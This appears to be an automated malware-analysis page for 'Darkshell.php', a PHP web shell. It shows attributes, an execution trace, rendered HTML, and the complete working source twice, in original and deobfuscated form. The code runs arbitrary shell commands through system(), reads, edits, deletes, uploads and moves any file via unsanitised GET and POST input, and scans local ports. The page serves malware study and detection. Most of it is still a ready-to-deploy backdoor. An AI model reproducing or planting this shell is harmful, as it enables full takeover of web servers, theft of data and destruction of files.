Darkshell.php

md5: 0631b3a548bdb904222fc28edd18e2f2

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
error_reporting (Deobfuscated, Original, Traces)
getcwd (Deobfuscated, Original, Traces)
set_time_limit (Deobfuscated, Original, Traces)

Execution
system (Deobfuscated)

Files
copy (Deobfuscated)
move_uploaded_file (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Deobfuscated PHP code
<html>
<head>
<title>
Dark Shell
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php 
error_reporting(0);
set_time_limit(0);
if (empty($_GET['dir'])) {
    $dir = getcwd();
} else {
    $dir = $_GET['dir'];
}
chdir($dir);
$current = htmlentities($_SERVER['PHP_SELF'] . "?dir=" . $dir);
echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
echo "<i>Server: " . $_SERVER['SERVER_NAME'] . "<br>\n";
echo "Current directory: " . getcwd() . "<br>\n";
echo "Software: " . $_SERVER['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
echo "<pre>\n\n\n</pre>";
echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = '" . $current . "&mode=system'>Shell Command</a></td>\n";
echo "<td><a href = '" . $current . "&mode=create'>Create a new file</a></td>\n";
echo "<td><a href = '" . $current . "&mode=upload'>Upload file</a></td>\n";
echo "<td><a href = '" . $current . "&mode=port_scan'>Port Scan</a></td>\n";
echo "</tr></table>";
echo "<pre>\n\n</pre>";
$mode = $_GET['mode'];
switch ($mode) {
    case 'edit':
        $file = $_GET['file'];
        $new = $_POST['new'];
        if (empty($new)) {
            $fp = fopen($file, "r");
            $file_cont = fread($fp, filesize($file));
            $file_cont = str_replace("</textarea>", "<textarea>", $file_cont);
            echo "<form action = '" . $current . "&mode=edit&file=" . $file . "' method = 'POST'>\n";
            echo "File: " . $file . "<br>\n";
            echo "<textarea name = 'new' rows = '30' cols = '50'>" . $file_cont . "</textarea><br>\n";
            echo "<input type = 'submit' value = 'Edit'></form>\n";
        } else {
            $fp = fopen($file, "w");
            if (fwrite($fp, $new)) {
                echo $file . " edited.<p>";
            } else {
                echo "Unable to edit " . $file . ".<p>";
            }
        }
        fclose($fp);
        break;
    case 'delete':
        $file = $_GET['file'];
        if (unlink($file)) {
            echo $file . " deleted successfully.<p>";
        } else {
            echo "Unable to delete " . $file . ".<p>";
        }
        break;
    case 'copy':
        $src = $_GET['src'];
        $dst = $_POST['dst'];
        if (empty($dst)) {
            echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Copy'></form>\n";
        } else {
            if (copy($src, $dst)) {
                echo "File copied successfully.<p>\n";
            } else {
                echo "Unable to copy " . $src . ".<p>\n";
            }
        }
        break;
    case 'move':
        $src = $_GET['src'];
        $dst = $_POST['dst'];
        if (empty($dst)) {
            echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Move'></form>\n";
        } else {
            if (rename($src, $dst)) {
                echo "File moved successfully.<p>\n";
            } else {
                echo "Unable to move " . $src . ".<p>\n";
            }
        }
        break;
    case 'rename':
        $old = $_GET['old'];
        $new = $_POST['new'];
        if (empty($new)) {
            echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
            echo "New name: <input name = 'new'><br>\n";
            echo "<input type = 'submit' value = 'Rename'></form>\n";
        } else {
            if (rename($old, $new)) {
                echo "File/Directory renamed successfully.<p>\n";
            } else {
                echo "Unable to rename " . $old . ".<p>\n";
            }
        }
        break;
    case 'rmdir':
        $rm = $_GET['rm'];
        if (rmdir($rm)) {
            echo "Directory removed successfully.<p>\n";
        } else {
            echo "Unable to remove " . $rm . ".<p>\n";
        }
        break;
    case 'system':
        $cmd = $_POST['cmd'];
        if (empty($cmd)) {
            echo "<form action = '" . $current . "&mode=system' method = 'POST'>\n";
            echo "Shell Command: <input name = 'cmd'>\n";
            echo "<input type = 'submit' value = 'Run'></form><p>\n";
        } else {
            system($cmd);
        }
        break;
    case 'create':
        $new = $_POST['new'];
        if (empty($new)) {
            echo "<form action = '" . $current . "&mode=create' method = 'POST'>\n";
            echo "<tr><td>New file: <input name = 'new'></td>\n";
            echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
        } else {
            if ($fp = fopen($new, "w")) {
                echo "File created successfully.<p>\n";
            } else {
                echo "Unable to create " . $file . ".<p>\n";
            }
            fclose($fp);
        }
        break;
    case 'upload':
        $temp = $_FILES['upload_file']['tmp_name'];
        $file = basename($_FILES['upload_file']['name']);
        if (empty($file)) {
            echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
            echo "Local file: <input type = 'file' name = 'upload_file'>\n";
            echo "<input type = 'submit' value = 'Upload'>\n";
            echo "</form>\n<pre>\n\n</pre>";
        } else {
            if (move_uploaded_file($temp, $file)) {
                echo "File uploaded successfully.<p>\n";
                unlink($temp);
            } else {
                echo "Unable to upload " . $file . ".<p>\n";
            }
        }
        break;
    case 'port_scan':
        $port_range = $_POST['port_range'];
        if (empty($port_range)) {
            echo "<table><form action = '" . $current . "&mode=port_scan' method = 'POST'>";
            echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
            echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
            echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
        } else {
            $range = explode(":", $port_range);
            if (!is_numeric($range[0]) or !is_numeric($range[1])) {
                echo "Bad parameters.<br>";
            } else {
                $host = 'localhost';
                $from = $range[0];
                $to = $range[1];
                echo "Open ports:<br>";
                while ($from <= $to) {
                    $var = 0;
                    $fp = fsockopen($host, $from) or $var = 1;
                    if (false) {
                        echo $from . "<br>";
                    }
                    $from++;
                    fclose($fp);
                }
            }
        }
        break;
}
clearstatcache();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir($dir);
foreach ($files as $file) {
    if (is_file($file)) {
        $size = round(filesize($file) / 1024, 2);
        echo "<tr><td>" . $file . "</td>";
        echo "<td>" . $size . " KB</td>";
        echo "<td><a href = " . $current . "&mode=edit&file=" . $file . ">Edit</a></td>\n";
        echo "<td><a href = " . $current . "&mode=delete&file=" . $file . ">Delete</a></td>\n";
        echo "<td><a href = " . $current . "&mode=copy&src=" . $file . ">Copy</a></td>\n";
        echo "<td><a href = " . $current . "&mode=move&src=" . $file . ">Move</a></td>\n";
        echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Remame</a></td></tr>\n";
    } else {
        $items = scandir($file);
        $items_num = count($items) - 2;
        echo "<tr><td>" . $file . "</td>";
        echo "<td>" . $items_num . " Items</td>";
        echo "<td><a href = " . $current . "/" . $file . ">Change directory</a></td>\n";
        echo "<td><a href = " . $current . "&mode=rmdir&rm=" . $file . ">Remove directory</a></td>\n";
        echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename directory</a></td></tr>\n";
    }
}
echo "</table>\n";
Execution traces
data/traces/0631b3a548bdb904222fc28edd18e2f2_trace-1676254737.3423.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:19:23.240116]
1	0	1	0.000150	393528
1	3	0	0.000401	434240	{main}	1		/var/www/html/uploads/Darkshell.php	0	0
2	4	0	0.000420	434240	error_reporting	0		/var/www/html/uploads/Darkshell.php	30	1	0
2	4	1	0.000435	434280
2	4	R			22527
2	5	0	0.000448	434240	set_time_limit	0		/var/www/html/uploads/Darkshell.php	31	1	0
2	5	1	0.000463	434304
2	5	R			FALSE
2	6	0	0.000478	434272	getcwd	0		/var/www/html/uploads/Darkshell.php	33	0
2	6	1	0.000491	434320
2	6	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/Darkshell.php	33	$dir = '/var/www/html/uploads'
2	7	0	0.000519	434320	chdir	0		/var/www/html/uploads/Darkshell.php	38	1	'/var/www/html/uploads'
2	7	1	0.000536	434408
2	7	R			TRUE
2	8	0	0.000550	434448	htmlentities	0		/var/www/html/uploads/Darkshell.php	39	1	'/uploads/Darkshell.php?dir=/var/www/html/uploads'
2	8	1	0.000566	434640
2	8	R			'/uploads/Darkshell.php?dir=/var/www/html/uploads'
1		A						/var/www/html/uploads/Darkshell.php	39	$current = '/uploads/Darkshell.php?dir=/var/www/html/uploads'
2	9	0	0.000595	434528	getcwd	0		/var/www/html/uploads/Darkshell.php	43	0
2	9	1	0.000607	434576
2	9	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/Darkshell.php	58	$mode = NULL
2	10	0	0.000638	434528	clearstatcache	0		/var/www/html/uploads/Darkshell.php	235	0
2	10	1	0.000650	434528
2	10	R			NULL
2	11	0	0.000663	434528	scandir	0		/var/www/html/uploads/Darkshell.php	239	1	'/var/www/html/uploads'
2	11	1	0.000695	435152
2	11	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Darkshell.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/Darkshell.php	239	$files = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Darkshell.php', 4 => 'data', 5 => 'prepend.php']
2	12	0	0.000733	435120	is_file	0		/var/www/html/uploads/Darkshell.php	241	1	'.'
2	12	1	0.000749	435168
2	12	R			FALSE
2	13	0	0.000762	435128	scandir	0		/var/www/html/uploads/Darkshell.php	253	1	'.'
2	13	1	0.000785	435752
2	13	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Darkshell.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/Darkshell.php	253	$items = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'Darkshell.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/Darkshell.php	254	$items_num = 4
2	14	0	0.000834	435720	is_file	0		/var/www/html/uploads/Darkshell.php	241	1	'..'
2	14	1	0.000849	435760
2	14	R			FALSE
2	15	0	0.000862	435720	scandir	0		/var/www/html/uploads/Darkshell.php	253	1	'..'
2	15	1	0.000883	436224
2	15	R			[0 => '.', 1 => '..', 2 => 'uploads']
1		A						/var/www/html/uploads/Darkshell.php	253	$items = [0 => '.', 1 => '..', 2 => 'uploads']
1		A						/var/www/html/uploads/Darkshell.php	254	$items_num = 1
2	16	0	0.000926	435600	is_file	0		/var/www/html/uploads/Darkshell.php	241	1	'.htaccess'
2	16	1	0.000941	435648
2	16	R			TRUE
2	17	0	0.000954	435608	filesize	0		/var/www/html/uploads/Darkshell.php	243	1	'.htaccess'
2	17	1	0.000967	435648
2	17	R			64
2	18	0	0.000980	435608	round	0		/var/www/html/uploads/Darkshell.php	243	2	0.0625	2
2	18	1	0.000994	435680
2	18	R			0.06
1		A						/var/www/html/uploads/Darkshell.php	243	$size = 0.06
2	19	0	0.001021	435608	is_file	0		/var/www/html/uploads/Darkshell.php	241	1	'Darkshell.php'
2	19	1	0.001036	435648
2	19	R			TRUE
2	20	0	0.001049	435608	filesize	0		/var/www/html/uploads/Darkshell.php	243	1	'Darkshell.php'
2	20	1	0.001061	435648
2	20	R			6735
2	21	0	0.001074	435608	round	0		/var/www/html/uploads/Darkshell.php	243	2	6.5771484375	2
2	21	1	0.001087	435680
2	21	R			6.58
1		A						/var/www/html/uploads/Darkshell.php	243	$size = 6.58
2	22	0	0.001113	435608	is_file	0		/var/www/html/uploads/Darkshell.php	241	1	'data'
2	22	1	0.001128	435640
2	22	R			FALSE
2	23	0	0.001140	435600	scandir	0		/var/www/html/uploads/Darkshell.php	253	1	'data'
2	23	1	0.001163	436128
2	23	R			[0 => '.', 1 => '..', 2 => 'trace-1676254737.3423.xt.gz']
1		A						/var/www/html/uploads/Darkshell.php	253	$items = [0 => '.', 1 => '..', 2 => 'trace-1676254737.3423.xt.gz']
1		A						/var/www/html/uploads/Darkshell.php	254	$items_num = 1
2	24	0	0.001207	435624	is_file	0		/var/www/html/uploads/Darkshell.php	241	1	'prepend.php'
2	24	1	0.001227	435672
2	24	R			TRUE
2	25	0	0.001241	435632	filesize	0		/var/www/html/uploads/Darkshell.php	243	1	'prepend.php'
2	25	1	0.001254	435672
2	25	R			57
2	26	0	0.001266	435632	round	0		/var/www/html/uploads/Darkshell.php	243	2	0.0556640625	2
2	26	1	0.001279	435704
2	26	R			0.06
1		A						/var/www/html/uploads/Darkshell.php	243	$size = 0.06
1	3	1	0.001306	435632
			0.001336	315800
TRACE END   [2023-02-13 00:19:23.241330]

Generated HTML code
<html><head>
<title>
Dark Shell
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<center><h1>Dark Shell</h1></center><p></p><hr><p>
<i>Server: localhost<br>
Current directory: /var/www/html<br>
Software: Apache/2.4.52 (Ubuntu)</i></p><pre><i>
</i></pre>
<pre>

</pre><table width="50%"><tbody><tr><td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=system">Shell Command</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=create">Create a new file</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=upload">Upload file</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=port_scan">Port Scan</a></td>
</tr></tbody></table><pre>
</pre><pre>
</pre><table width="100%">
<tbody><tr><td>.</td><td>2 Items</td><td><a href="/Darkshell.php?dir=/var/www/html/.">Change directory</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=rmdir&amp;rm=.">Remove directory</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=rename&amp;old=.">Rename directory</a></td></tr>
<tr><td>..</td><td>2 Items</td><td><a href="/Darkshell.php?dir=/var/www/html/..">Change directory</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=rmdir&amp;rm=..">Remove directory</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=rename&amp;old=..">Rename directory</a></td></tr>
<tr><td>Darkshell.php</td><td>6.58 KB</td><td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=edit&amp;file=Darkshell.php">Edit</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=delete&amp;file=Darkshell.php">Delete</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=copy&amp;src=Darkshell.php">Copy</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=move&amp;src=Darkshell.php">Move</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=rename&amp;old=Darkshell.php">Remame</a></td></tr>
<tr><td>beneri.se_malware_analysis</td><td>0 KB</td><td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=edit&amp;file=beneri.se_malware_analysis">Edit</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=delete&amp;file=beneri.se_malware_analysis">Delete</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=copy&amp;src=beneri.se_malware_analysis">Copy</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=move&amp;src=beneri.se_malware_analysis">Move</a></td>
<td><a href="/Darkshell.php?dir=/var/www/html&amp;mode=rename&amp;old=beneri.se_malware_analysis">Remame</a></td></tr>
</tbody></table>
</body></html>
Original PHP code
<html>
<head>
<title>
Dark Shell
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
error_reporting (0);
set_time_limit (0);
if (empty ($_GET ['dir'])){
$dir = getcwd ();
}
else {
$dir = $_GET ['dir'];
}
chdir ($dir);
$current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);

echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>\n";
echo "Current directory: " . getcwd () . "<br>\n";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
echo "<pre>\n\n\n</pre>";

echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = '".$current."&mode=system'>Shell Command</a></td>\n";
echo "<td><a href = '".$current."&mode=create'>Create a new file</a></td>\n";
echo "<td><a href = '".$current."&mode=upload'>Upload file</a></td>\n";
echo "<td><a href = '".$current."&mode=port_scan'>Port Scan</a></td>\n";
echo "</tr></table>";
echo "<pre>\n\n</pre>";



$mode = $_GET ['mode'];
switch ($mode){
case 'edit':
$file = $_GET ['file'];
$new = $_POST ['new'];
if (empty ($new)){
$fp = fopen ($file, "r");
$file_cont = fread ($fp, filesize ($file));
$file_cont = str_replace ("</textarea>", "<textarea>", $file_cont);
echo "<form action = '".$current."&mode=edit&file=".$file."' method = 'POST'>\n";
echo "File: ". $file . "<br>\n";
echo "<textarea name = 'new' rows = '30' cols = '50'>".$file_cont."</textarea><br>\n";
echo "<input type = 'submit' value = 'Edit'></form>\n";
}
else {
$fp = fopen ($file, "w");
if (fwrite ($fp, $new)){
echo $file . " edited.<p>";
}
else {
echo "Unable to edit " . $file . ".<p>";
}
}
fclose ($fp);
break;
case 'delete':
$file = $_GET ['file'];
if (unlink ($file)){
echo $file . " deleted successfully.<p>";
}
else {
echo "Unable to delete " . $file . ".<p>";
}
break;
case 'copy':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)){
echo "<form action = '".$current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
}
else {
if (copy ($src, $dst)){
echo "File copied successfully.<p>\n";
}
else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
case 'move':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)){
echo "<form action = '".$current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
}
else {
if (rename ($src, $dst)){
echo "File moved successfully.<p>\n";
}
else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
case 'rename':
$old = $_GET ['old'];
$new = $_POST ['new'];
if (empty ($new)){
echo "<form action = '".$current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
}
else {
if (rename ($old, $new)){
echo "File/Directory renamed successfully.<p>\n";
}
else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;

case 'rmdir':
$rm = $_GET ['rm'];
if (rmdir ($rm)){
echo "Directory removed successfully.<p>\n";
}
else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
case 'system':
$cmd = $_POST ['cmd'];
if (empty ($cmd)){
echo "<form action = '".$current . "&mode=system' method = 'POST'>\n";
echo "Shell Command: <input name = 'cmd'>\n";
echo "<input type = 'submit' value = 'Run'></form><p>\n";
}
else {
system ($cmd);
}
break;
case 'create':
$new = $_POST ['new'];
if (empty ($new)){
echo "<form action = '".$current . "&mode=create' method = 'POST'>\n";
echo "<tr><td>New file: <input name = 'new'></td>\n";
echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
}
else {
if ($fp = fopen ($new, "w")){
echo "File created successfully.<p>\n";
}
else {
echo "Unable to create ".$file.".<p>\n";
}
fclose ($fp);
}
break;
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (empty ($file)){
echo "<form action = '".$current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>\n";
echo "<input type = 'submit' value = 'Upload'>\n";
echo "</form>\n<pre>\n\n</pre>";
}
else {
if(move_uploaded_file($temp,$file)){
echo "File uploaded successfully.<p>\n";
unlink ($temp);
}
else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;

case 'port_scan':
$port_range = $_POST ['port_range'];
if (empty ($port_range)){
echo "<table><form action = '".$current. "&mode=port_scan' method = 'POST'>";
echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
}
else {
$range = explode (":", $port_range);
if ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){
echo "Bad parameters.<br>";
}
else {
$host = 'localhost';
$from = $range [0];
$to = $range [1];
echo "Open ports:<br>";
while ($from <= $to){
$var = 0;
$fp = fsockopen ($host, $from) or $var = 1;
if ($var == 0){
echo $from . "<br>";
}
$from++;
fclose ($fp);
}
}
}
break;


}

clearstatcache ();

echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir ($dir);
foreach ($files as $file){
if (is_file ($file)){

$size = round (filesize ($file) / 1024, 2);
echo "<tr><td>".$file."</td>";
echo "<td>".$size." KB</td>";
echo "<td><a href = ".$current . "&mode=edit&file=".$file.">Edit</a></td>\n";
echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>\n";
echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>\n";
echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>\n";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>\n";
}
else {
$items = scandir ($file);
$items_num = count ($items) - 2;
echo "<tr><td>".$file."</td>";
echo "<td>".$items_num." Items</td>";
echo "<td><a href = ".$current . "/" . $file.">Change directory</a></td>\n";
echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>\n";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>\n";
}
}
echo "</table>\n";
?>
PHP Malware Analysis

Darkshell.php

md5: 0631b3a548bdb904222fc28edd18e2f2

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
